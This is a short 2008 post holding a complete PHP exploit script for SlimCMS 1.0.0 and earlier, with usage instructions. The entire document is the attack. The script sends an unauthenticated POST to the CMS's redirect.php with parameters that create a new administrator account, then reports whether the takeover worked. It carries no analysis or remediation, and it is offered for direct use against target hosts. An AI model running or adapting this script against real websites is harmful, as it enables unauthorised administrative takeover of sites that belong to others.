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Posted on 11 October 2008

#!/usr/bin/php -q <?php /* SlimCMS <= 1.0.0 Privilege Escalation Exploit Discovered By StAkeR aka athos - StAkeR[at]hotmail[dot]it Discovered On 11/10/2008 http://downloads.sourceforge.net/slimcms/SlimCMS-1.0.0.tgz?modtime=1217343227&big_mirror=0 */ error_reporting(0); $host = $argv[1]; $host = str_replace('http://',NULL,$host); $path = $argv[2]."/redirect.php"; $user = $argv[3]; if(!preg_match('/http://(.+?)$/',$host) and strlen($user) < 5) { echo "[?] Usage: php $argv[0][host][path][username] "; echo "[?] Usage: php $argv[0] http://localhost /cms milw0rm "; exit; } if(!$sock = fsockopen($host,80)) { die("Socket Error "); } $post .= "newusername=$user&newpassword=$user&newisadmin=1"; $data .= "POST /$path HTTP/1.1 "; $data .= "Host: $host "; $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U) "; $data .= "Content-Type: application/x-www-form-urlencoded "; $data .= "Content-Length: ".strlen($post)." "; $data .= "Connection: close "; $data .= "$post "; fputs($sock,$data); while(!feof($sock)) { $content .= fgets($sock); } fclose($sock); if(eregi('change.php',$content)) { echo "[?] Added New Administrator! "; echo "[?] Username and Password: $user "; exit; } else { echo "[?] Exploit Failed! "; } ?>